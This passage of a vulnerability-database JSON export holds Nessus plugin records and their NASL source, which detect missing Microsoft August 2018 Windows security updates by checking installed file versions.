severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"10240\",\n rollup_date:\"08_2018\",\n bulletin:bulletin,\n rollup_kb_list:[4343892])\n )\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-14T18:31:09", "description": "The remote Windows host is missing security updates. It is,\ntherefore, affected by multiple vulnerabilities :\n\n - Errors exist related to microprocessors utilizing\n speculative execution and L1 data cache that could\n allow information disclosure. (CVE-2018-3615,\n CVE-2018-3620, CVE-2018-3646)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited the vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2018-8344)\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8385)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows that could allow remote code execution\n if a .LNK file is processed. An attacker who\n successfully exploited this vulnerability could gain the\n same user rights as the local user. (CVE-2018-8345,\n CVE-2018-8346)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2018-8394, CVE-2018-8396, CVE-2018-8398)\n\n - A remote code execution vulnerability exists in the way\n that the Windows Graphics Device Interface (GDI) handles\n objects in the memory. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2018-8397)\n\n - A remote code execution vulnerability exists in\n 'Microsoft COM for Windows' when it fails to\n properly handle serialized objects. An attacker who\n successfully exploited the vulnerability could use a\n specially crafted file or script to perform actions. In\n an email attack scenario, an attacker could exploit the\n vulnerability by sending the specially crafted file to\n the user and convincing the user to open the file.\n (CVE-2018-8349)\n\n - An elevation of privilege vulnerability exists in the\n Windows Installer when the Windows Installer fails to\n properly sanitize input leading to an insecure library\n loading behavior. A locally authenticated attacker could\n run arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. The security update addresses the vulnerability\n by correcting the input sanitization error to preclude\n unintended elevation. (CVE-2018-8339)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2018-8348)", "edition": 28, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-08-14T00:00:00", "title": "Security Updates for Windows Server 2008 (August 2018) (Foreshadow)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-8345", "CVE-2018-8339", "CVE-2018-8344", "CVE-2018-8394", "CVE-2018-3646", "CVE-2018-8397", "CVE-2018-8396", "CVE-2018-3620", "CVE-2018-3615", "CVE-2018-8348", "CVE-2018-8346", "CVE-2018-8385", "CVE-2018-8398", "CVE-2018-8349"], "modified": "2018-08-14T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS18_AUG_WIN2008.NASL", "href": "https://www.tenable.com/plugins/nessus/111700", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(111700);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/09/04\");\n\n script_cve_id(\n \"CVE-2018-3615\",\n \"CVE-2018-3620\",\n \"CVE-2018-3646\",\n \"CVE-2018-8339\",\n \"CVE-2018-8344\",\n \"CVE-2018-8345\",\n \"CVE-2018-8346\",\n \"CVE-2018-8348\",\n \"CVE-2018-8349\",\n \"CVE-2018-8394\",\n \"CVE-2018-8396\",\n \"CVE-2018-8397\",\n \"CVE-2018-8398\"\n );\n script_bugtraq_id(\n 104983,\n 104984,\n 104992,\n 104994,\n 104995,\n 105001,\n 105002,\n 105027,\n 105028,\n 105030,\n 105080\n );\n script_xref(name:\"MSKB\", value:\"4338380\");\n script_xref(name:\"MSKB\", value:\"4340937\");\n script_xref(name:\"MSKB\", value:\"4340939\");\n script_xref(name:\"MSKB\", value:\"4341832\");\n script_xref(name:\"MSKB\", value:\"4343674\");\n script_xref(name:\"MSKB\", value:\"4344104\");\n script_xref(name:\"MSFT\", value:\"MS18-4338380\");\n script_xref(name:\"MSFT\", value:\"MS18-4340937\");\n script_xref(name:\"MSFT\", value:\"MS18-4340939\");\n script_xref(name:\"MSFT\", value:\"MS18-4341832\");\n script_xref(name:\"MSFT\", value:\"MS18-4343674\");\n script_xref(name:\"MSFT\", value:\"MS18-4344104\");\n\n script_name(english:\"Security Updates for Windows Server 2008 (August 2018) (Foreshadow)\");\n script_summary(english:\"Checks for Microsoft security updates.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security updates. It is,\ntherefore, affected by multiple vulnerabilities :\n\n - Errors exist related to microprocessors utilizing\n speculative execution and L1 data cache that could\n allow information disclosure. (CVE-2018-3615,\n CVE-2018-3620, CVE-2018-3646)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited the vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2018-8344)\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8385)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows that could allow remote code execution\n if a .LNK file is processed. An attacker who\n successfully exploited this vulnerability could gain the\n same user rights as the local user. (CVE-2018-8345,\n CVE-2018-8346)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2018-8394, CVE-2018-8396, CVE-2018-8398)\n\n - A remote code execution vulnerability exists in the way\n that the Windows Graphics Device Interface (GDI) handles\n objects in the memory. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2018-8397)\n\n - A remote code execution vulnerability exists in\n 'Microsoft COM for Windows' when it fails to\n properly handle serialized objects. An attacker who\n successfully exploited the vulnerability could use a\n specially crafted file or script to perform actions. In\n an email attack scenario, an attacker could exploit the\n vulnerability by sending the specially crafted file to\n the user and convincing the user to open the file.\n (CVE-2018-8349)\n\n - An elevation of privilege vulnerability exists in the\n Windows Installer when the Windows Installer fails to\n properly sanitize input leading to an insecure library\n loading behavior. A locally authenticated attacker could\n run arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. The security update addresses the vulnerability\n by correcting the input sanitization error to preclude\n unintended elevation. (CVE-2018-8339)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2018-8348)\");\n # https://support.microsoft.com/en-us/help/4338380/security-update-for-vulnerabilities-in-windows-server-2008\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1277e89e\");\n # https://support.microsoft.com/en-us/help/4341832/security-update-for-vulnerabilities-in-windows-server-2008\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b27d8590\");\n # https://support.microsoft.com/en-us/help/4340937/security-update-for-the-microsoft-com-vulnerabilities-in-windows\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?03764b1c\");\n # https://support.microsoft.com/en-us/help/4344104/security-update-for-font-library-vulnerability-in-windows\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8782f358\");\n # https://support.microsoft.com/en-us/help/4343674/security-update-for-gdi-vulnerabilities-in-windows\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?3f77c369\");\n # https://support.microsoft.com/en-us/help/4340939/security-update-for-vulnerabilities-in-windows-server-2008\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?09c0d01f\");\n # https://blogs.technet.microsoft.com/srd/2018/08/10/analysis-and-mitigation-of-l1-terminal-fault-l1tf/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?818d7d6a\");\n # https://support.microsoft.com/en-us/help/4072698/windows-server-speculative-execution-side-channel-vulnerabilities-prot\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8902cebb\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released security updates for Windows Server 2008.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-8344\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/08/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/08/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/08/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\", \"microsoft_windows_env_vars.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"smb_reg_query.inc\");\ninclude(\"lists.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS18-08';\n\nkbs = make_list(\n '4338380',\n '4340937',\n '4340939',\n '4341832',\n '4343674',\n '4344104'\n);\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\n# KBs only apply to Windows 2008\nif (hotfix_check_sp_range(vista:'2') <= 0)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Vista\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nsystemroot = hotfix_get_systemroot();\nif (!systemroot) audit(AUDIT_PATH_NOT_DETERMINED, 'system root');\n\nport = kb_smb_transport();\nlogin = kb_smb_login();\npass = kb_smb_password();\ndomain = kb_smb_domain();\n\nif(! smb_session_init()) audit(AUDIT_FN_FAIL, 'smb_session_init');\n\nwinsxs = ereg_replace(pattern:'^[A-Za-z]:(.*)', replace:\"\\1\\WinSxS\", string:systemroot);\nwinsxs_share = hotfix_path2share(path:systemroot);\n\nrc = NetUseAdd(login:login, password:pass, domain:domain, share:winsxs_share);\nif (rc != 1)\n{\n NetUseDel();\n audit(AUDIT_SHARE_FAIL, winsxs_share);\n}\n\nthe_session = make_array(\n 'login', login,\n 'password', pass,\n 'domain', domain,\n 'share', winsxs_share\n);\n\nvuln = 0;\n\n\n# KB4338380\nfiles = list_dir(basedir:winsxs, level:0, dir_pat:\"offlinefiles-core_31bf3856ad364e35\", file_pat:\"^csc\\.sys$\", max_recurse:1);\nvuln += hotfix_check_winsxs(os:'6.0',\n sp:2,\n files:files,\n versions:make_list('6.0.6002.24436'),\n max_versions:make_list('6.0.6003.99999'),\n bulletin:bulletin,\n kb:\"4338380\", session:the_session);\n\n# KB4340937\nfiles = list_dir(basedir:winsxs, level:0, dir_pat:\"installer-engine_31bf3856ad364e35\", file_pat:\"^msi\\.dll$\", max_recurse:1);\nvuln += hotfix_check_winsxs(os:'6.0',\n sp:2,\n files:files,\n versions:make_list('4.5.6002.24433'),\n max_versions:make_list('4.5.6002.99999'),\n bulletin:bulletin,\n kb:\"4340937\", session:the_session);\n\n# KB4340939\nfiles = list_dir(basedir:winsxs, level:0, dir_pat:\"structuredquery_31bf3856ad364e35\", file_pat:\"^msshsq\\.dll$\", max_recurse:1);\nvuln += hotfix_check_winsxs(os:'6.0',\n sp:2,\n files:files,\n versions:make_list('7.0.6002.24434'),\n max_versions:make_list('7.0.6002.99999'),\n bulletin:bulletin,\n kb:\"4340939\", session:the_session);\n\n# KB4341832\nfiles = list_dir(basedir:winsxs, level:0, dir_pat:\"os-kernel_31bf3856ad364e35\", file_pat:\"^ntoskrnl\\.exe$\", max_recurse:1);\nvuln += hotfix_check_winsxs(os:'6.0',\n sp:2,\n files:files,\n versions:make_list('6.0.6002.24444'),\n max_versions:make_list('6.0.6003.99999'),\n bulletin:bulletin,\n kb:\"4341832\", session:the_session);\n\n# KB4343674\nfiles = list_dir(basedir:winsxs, level:0, dir_pat:\"gdi-painting_31bf3856ad364e35\", file_pat:\"^msimg32\\.dll$\", max_recurse:1);\nvuln += hotfix_check_winsxs(os:'6.0',\n sp:2,\n files:files,\n versions:make_list('6.0.6002.24439'),\n max_versions:make_list('6.0.6003.99999'),\n bulletin:bulletin,\n kb:\"4343674\", session:the_session);\n\n# KB4344104\nfiles = list_dir(basedir:winsxs, level:0, dir_pat:\"-gdi_31bf3856ad364e35\", file_pat:\"^dciman32\\.dll$\", max_recurse:1);\nvuln += hotfix_check_winsxs(os:'6.0',\n sp:2,\n files:files,\n versions:make_list('6.0.6002.24441'),\n max_versions:make_list('6.0.6003.99999'),\n bulletin:bulletin,\n kb:\"4344104\", session:the_session);\n\nhotfix_check_fversion_end();\nNetUseDel();\n\nif (vuln > 0)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n exit(0);\n}\nelse\n{\n audit(AUDIT_HOST_NOT, 'affected');\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-14T18:31:05", "description": "The remote Windows host is missing security update 4343887.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2018-8341, CVE-2018-8348)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited the vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2018-8344)\n\n - An elevation of privilege vulnerability exists in the\n Network Driver Interface Specification (NDIS) when\n ndis.sys fails to check the length of a buffer prior to\n copying memory to it. (CVE-2018-8343)\n\n - A remote code execution vulnerability exists in\n &quot;Microsoft COM for Windows&quot; when it fails to\n properly handle serialized objects. An attacker who\n successfully exploited the vulnerability could use a\n specially crafted file or script to perform actions. In\n an email attack scenario, an attacker could exploit the\n vulnerability by sending the specially crafted file to\n the user and convincing the user to open the file.\n (CVE-2018-8349)\n\n - A security feature bypass vulnerability exists when\n Microsoft Edge improperly handles redirect requests. The\n vulnerability allows Microsoft Edge to bypass Cross-\n Origin Resource Sharing (CORS) redirect restrictions,\n and to follow redirect requests that should otherwise be\n ignored. An attacker who successfully exploited the\n vulnerability could force the browser to send data that\n would otherwise be restricted to a destination website\n of the attacker's choice. (CVE-2018-8358)\n\n - A security feature bypass vulnerability exists in Device\n Guard that could allow an attacker to inject malicious\n code into a Windows PowerShell session. An attacker who\n successfully exploited this vulnerability could inject\n code into a trusted PowerShell process to bypass the\n Device Guard Code Integrity policy on the local machine.\n (CVE-2018-8200, CVE-2018-8204)\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8355, CVE-2018-8372, CVE-2018-8385)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Windows when the Windows kernel fails to\n properly handle parsing of certain symbolic links. An\n attacker who successfully exploited this vulnerability\n could potentially access privileged registry keys and\n thereby elevate permissions. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2018-8347)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows that could allow remote code execution\n if a .LNK file is processed. An attacker who\n successfully exploited this vulnerability could gain the\n same user rights as the local user. (CVE-2018-8345)\n\n - A information disclosure vulnerability exists when\n WebAudio Library improperly handles audio requests. An\n attacker who has successfully exploited this\n vulnerability might be able to read privileged data\n across trust boundaries. In browsing scenarios, an\n attacker could convince a user to visit a malicious site\n and leverage the vulnerability to obtain privileged\n information from the browser process, such as sensitive\n data from other opened tabs. An attacker could also\n inject malicious code into advertising networks used by\n trusted sites or embed malicious code on a compromised,\n but trusted, site. The update addresses the\n vulnerability by correcting how the WebAudio Library\n handles audio requests. (CVE-2018-8370)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2018-8404)\n\n - An elevation of privilege vulnerability exists in the\n Windows Installer when the Windows Installer fails to\n properly sanitize input leading to an insecure library\n loading behavior. A locally authenticated attacker could\n run arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. The security update addresses the vulnerability\n by correcting the input sanitization error to preclude\n unintended elevation. (CVE-2018-8339)\n\n - A security feature bypass vulnerability exists when\n Active Directory Federation Services (AD FS) improperly\n handles multi-factor authentication requests.\n (CVE-2018-8340)\n\n - A remote code execution vulnerability exists in the way\n that the Chakra scripting engine handles objects in\n memory in Microsoft Edge. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. An attacker who successfully exploited the\n vulnerability could gain the same user rights as the\n current user. (CVE-2018-8266, CVE-2018-8381)\n\n - An elevation of privilege vulnerability exists when\n Microsoft Cortana allows arbitrary website browsing on\n the lockscreen. An attacker who successfully exploited\n the vulnerability could steal browser stored passwords\n or log on to websites as another user. (CVE-2018-8253)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly validates hyperlinks before\n loading executable libraries. An attacker who\n successfully exploited this vulnerability could take\n control of an affected system. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2018-8316)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2018-8394, CVE-2018-8398)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8403)\n\n - An information disclosure vulnerability exists when\n affected Microsoft browsers improperly allow cross-frame\n interaction. An attacker who successfully exploited this\n vulnerability could allow an attacker to obtain browser\n frame or window state from a different domain. For an\n attack to be successful, an attacker must persuade a\n user to open a malicious website from a secure website.\n This update addresses the vulnerability by denying\n permission to read the state of the object model, to\n which frames or windows on different domains should not\n have access. (CVE-2018-8351)\n\n - An elevation of privilege vulnerability exists in\n Microsoft browsers allowing sandbox escape. An attacker\n who successfully exploited the vulnerability could use\n the sandbox escape to elevate privileges on an affected\n system. This vulnerability by itself does not allow\n arbitrary code execution; however, it could allow\n arbitrary code to be run if the attacker uses it in\n combination with another vulnerability (such as a remote\n code execution vulnerability or another elevation of\n privilege vulnerability) that is capable of leveraging\n the elevated privileges when code execution is\n attempted. (CVE-2018-8357)\n\n - An Elevation of Privilege vulnerability exists when\n Diagnostics Hub Standard Collector allows file creation\n in arbitrary locations. (CVE-2018-0952)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8353, CVE-2018-8371, CVE-2018-8373,\n CVE-2018-8389)\n\n - An elevation of privilege vulnerability exists when the\n DirectX Graphics Kernel (DXGKRNL) driver improperly\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2018-8401, CVE-2018-8405,\n CVE-2018-8406)\n\n - An information disclosure vulnerability exists in\n Microsoft .NET Framework that could allow an attacker to\n access information in multi-tenant environments. The\n vulnerability is caused when .NET Framework is used in\n high-load/high-density network connections where content\n from one stream can blend into another stream.\n (CVE-2018-8360)\n\n - A spoofing vulnerability exists when Microsoft Edge\n improperly handles specific HTML content. An attacker\n who successfully exploited this vulnerability could\n trick a user into believing that the user was on a\n legitimate website. The specially crafted website could\n either spoof content or serve as a pivot to chain an\n attack with other vulnerabilities in web services.\n (CVE-2018-8388)", "edition": 30, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-08-14T00:00:00", "title": "KB4343887: Windows 10 Version 1607 and Windows Server 2016 August 2018 Security Update (Foreshadow)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-8401", "CVE-2018-0952", "CVE-2018-8200", "CVE-2018-8343", "CVE-2018-8406", "CVE-2018-8345", "CVE-2018-8351", "CVE-2018-8358", "CVE-2018-8403", "CVE-2018-8372", "CVE-2018-8388", "CVE-2018-8405", "CVE-2018-8339", "CVE-2018-8344", "CVE-2018-8355", "CVE-2018-8394", "CVE-2018-3646", "CVE-2018-8316", "CVE-2018-8373", "CVE-2018-8357", "CVE-2018-8266", "CVE-2018-3620", "CVE-2018-8404", "CVE-2018-3615", "CVE-2018-8348", "CVE-2018-8370", "CVE-2018-8341", "CVE-2018-8204", "CVE-2018-8347", "CVE-2018-8385", "CVE-2018-8381", "CVE-2018-8253", "CVE-2018-8371", "CVE-2018-8340", "CVE-2018-8360", "CVE-2018-8389", "CVE-2018-8398", "CVE-2018-8353", "CVE-2018-8349"], "modified": "2018-08-14T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS18_AUG_4343887.NASL", "href": "https://www.tenable.com/plugins/nessus/111685", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(111685);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/08/18\");\n\n script_cve_id(\n \"CVE-2018-3615\",\n \"CVE-2018-3620\",\n \"CVE-2018-3646\",\n \"CVE-2018-0952\",\n \"CVE-2018-8200\",\n \"CVE-2018-8204\",\n \"CVE-2018-8253\",\n \"CVE-2018-8266\",\n \"CVE-2018-8316\",\n \"CVE-2018-8339\",\n \"CVE-2018-8340\",\n \"CVE-2018-8341\",\n \"CVE-2018-8343\",\n \"CVE-2018-8344\",\n \"CVE-2018-8345\",\n \"CVE-2018-8347\",\n \"CVE-2018-8348\",\n \"CVE-2018-8349\",\n \"CVE-2018-8351\",\n \"CVE-2018-8353\",\n \"CVE-2018-8355\",\n \"CVE-2018-8357\",\n \"CVE-2018-8358\",\n \"CVE-2018-8360\",\n \"CVE-2018-8370\",\n \"CVE-2018-8371\",\n \"CVE-2018-8372\",\n \"CVE-2018-8373\",\n \"CVE-2018-8381\",\n \"CVE-2018-8385\",\n \"CVE-2018-8388\",\n \"CVE-2018-8389\",\n \"CVE-2018-8394\",\n \"CVE-2018-8398\",\n \"CVE-2018-8401\",\n \"CVE-2018-8403\",\n \"CVE-2018-8404\",\n \"CVE-2018-8405\",\n \"CVE-2018-8406\"\n );\n script_bugtraq_id(\n 104977,\n 104978,\n 104980,\n 104982,\n 104983,\n 104984,\n 104986,\n 104987,\n 104988,\n 104992,\n 104995,\n 104999,\n 105001,\n 105006,\n 105007,\n 105008,\n 105009,\n 105011,\n 105012,\n 105017,\n 105027,\n 105029,\n 105030,\n 105048\n );\n script_xref(name:\"MSKB\", value:\"4343887\");\n script_xref(name:\"MSFT\", value:\"MS18-4343887\");\n\n script_name(english:\"KB4343887: Windows 10 Version 1607 and Windows Server 2016 August 2018 Security Update (Foreshadow)\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4343887.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2018-8341, CVE-2018-8348)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited the vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2018-8344)\n\n - An elevation of privilege vulnerability exists in the\n Network Driver Interface Specification (NDIS) when\n ndis.sys fails to check the length of a buffer prior to\n copying memory to it. (CVE-2018-8343)\n\n - A remote code execution vulnerability exists in\n &quot;Microsoft COM for Windows&quot; when it fails to\n properly handle serialized objects. An attacker who\n successfully exploited the vulnerability could use a\n specially crafted file or script to perform actions. In\n an email attack scenario, an attacker could exploit the\n vulnerability by sending the specially crafted file to\n the user and convincing the user to open the file.\n (CVE-2018-8349)\n\n - A security feature bypass vulnerability exists when\n Microsoft Edge improperly handles redirect requests. The\n vulnerability allows Microsoft Edge to bypass Cross-\n Origin Resource Sharing (CORS) redirect restrictions,\n and to follow redirect requests that should otherwise be\n ignored. An attacker who successfully exploited the\n vulnerability could force the browser to send data that\n would otherwise be restricted to a destination website\n of the attacker's choice. (CVE-2018-8358)\n\n - A security feature bypass vulnerability exists in Device\n Guard that could allow an attacker to inject malicious\n code into a Windows PowerShell session. An attacker who\n successfully exploited this vulnerability could inject\n code into a trusted PowerShell process to bypass the\n Device Guard Code Integrity policy on the local machine.\n (CVE-2018-8200, CVE-2018-8204)\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8355, CVE-2018-8372, CVE-2018-8385)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Windows when the Windows kernel fails to\n properly handle parsing of certain symbolic links. An\n attacker who successfully exploited this vulnerability\n could potentially access privileged registry keys and\n thereby elevate permissions. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2018-8347)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows that could allow remote code execution\n if a .LNK file is processed. An attacker who\n successfully exploited this vulnerability could gain 